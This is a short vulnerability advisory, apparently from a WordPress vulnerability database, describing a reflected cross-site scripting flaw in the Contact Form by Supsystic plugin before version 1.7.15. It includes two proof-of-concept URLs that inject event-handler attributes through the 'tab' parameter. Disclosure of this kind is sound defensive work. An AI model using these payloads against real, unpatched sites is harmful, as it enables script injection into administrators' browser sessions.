Contact Form by Supsystic < 1.7.15 - Reflected Cross-Site scripting (XSS)
Description
The plugin did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
Proof of Concept
/wp-admin/admin.php?page=contact-form-supsystic&tab="onmouseover=alert(1)// /wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
Affects Plugins
Fixed in version 1.7.15✓
References
Classification
Miscellaneous
Original Researcher
0xB9
Submitter
0xB9
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-04-19 (about 3 months ago)
Added
2021-04-19 (about 3 months ago)
Last Updated
2021-04-20 (about 3 months ago)